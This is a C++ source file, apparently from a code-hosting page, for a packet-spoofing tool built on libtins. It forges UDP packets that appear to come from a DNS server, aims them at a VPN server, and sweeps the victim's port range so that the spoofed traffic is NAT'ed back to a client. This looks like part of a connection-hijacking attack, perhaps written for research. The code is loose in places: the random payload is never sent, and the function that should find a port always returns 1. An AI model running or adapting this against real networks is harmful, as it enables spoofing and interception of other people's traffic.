You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

165 lines
3.5 KiB

  1. #include <tins/tins.h>
  2. #include <cassert>
  3. #include <iostream>
  4. #include <string>
  5. #include <unistd.h>
  6. #include <thread>
  7. #include <random>
  8. using std::thread;
  9. using std::cout;
  10. using std::string;
  11. using std::vector;
  12. using namespace Tins;
  13. bool is_running = true;
  14. bool verbose = false;
  15. bool count_resp = false;
  16. string dest_ip;
  17. string server_ip;
  18. void print_divider(int count) {
  19. int i = 0;
  20. while (i < count) {
  21. if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
  22. i++;
  23. }
  24. }
  25. std::string random_string(std::size_t length) {
  26. const std::string CHARACTERS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  27. std::random_device random_device;
  28. std::mt19937 generator(random_device());
  29. std::uniform_int_distribution<> distribution(0, CHARACTERS.size() - 1);
  30. string random_string;
  31. for (std::size_t i = 0; i < length; ++i) {
  32. random_string += CHARACTERS[distribution(generator)];
  33. }
  34. return random_string;
  35. }
  36. // Spreads UDPs across the victim's entire port range
  37. // to find a port that is being used and the spoofed packets
  38. // get NAT'ed back to the client
  39. //
  40. int spread_uds(bool server_spread, string server_ip, int server_port, string dest_ip, int start_port, int end_port) {
  41. PacketSender sender;
  42. NetworkInterface iface("enp0s9");
  43. int i;
  44. IP pkt;
  45. if (server_spread) pkt = IP(dest_ip, server_ip) / UDP(start_port, server_port);
  46. else pkt = IP(server_ip, dest_ip) / UDP(server_port, start_port);
  47. UDP& udp = pkt.rfind_pdu<UDP>();
  48. int spoof_port = start_port;
  49. int send_size = 0;
  50. int send_count = 0;
  51. string send_payload = random_string(send_size);
  52. cout << "spreading the port range from " << spoof_port << " to " << end_port << " with udps..\n";
  53. while (spoof_port < end_port) {
  54. if (server_spread) udp.dport(spoof_port); // set the packets src port to current guess
  55. else udp.sport(spoof_port);
  56. sender.send(pkt, iface);
  57. spoof_port++;
  58. send_size ++;
  59. send_payload = random_string(send_size);
  60. //cout << "next rando string: " << send_payload << "\n";
  61. // if the payload size reaches 1000 (max), reset back to 0
  62. if (send_size >= 1000) {
  63. send_size = 0;
  64. cout << "Sent w size 1000 to " << spoof_port << "\n";
  65. }
  66. usleep(1);
  67. }
  68. if (verbose) print_divider(2);
  69. return 1;
  70. }
  71. int fill_ports(bool server_spread, string source_ip, int sport, string dest_ip, int start_port, int end_port) {
  72. bool filling = true;
  73. int current_port = 0;
  74. while (filling) {
  75. current_port = spread_uds(server_spread, source_ip, sport, dest_ip, start_port, end_port);
  76. print_divider(1);
  77. if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
  78. count_resp = true;
  79. filling = false;
  80. print_divider(2);
  81. }
  82. return current_port;
  83. }
  84. int main(int argc, char** argv) {
  85. cout << "arc twas: " << argc;
  86. if (argc != 6 && argc != 7) {
  87. cout << "sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port <enable_server_spread>)\n";
  88. return 0;
  89. }
  90. server_ip = argv[1]; // dns server IP
  91. int server_port = atoi(argv[2]);
  92. dest_ip = argv[3]; // vpn server IP
  93. int start_port = atoi(argv[4]);
  94. int end_port = atoi(argv[5]);
  95. bool server_spread = false;
  96. if (argc == 7) server_spread = true;
  97. verbose = true;
  98. string dest_mac = "";
  99. string src_mac = "";
  100. print_divider(2);
  101. int p = fill_ports(server_spread, server_ip, server_port, dest_ip, start_port, end_port);
  102. cout << p << "\n";
  103. print_divider(1);
  104. is_running = false;
  105. if (verbose) cout << "Filled up all those ports and finished at: " << p << "\n";
  106. return p;
  107. }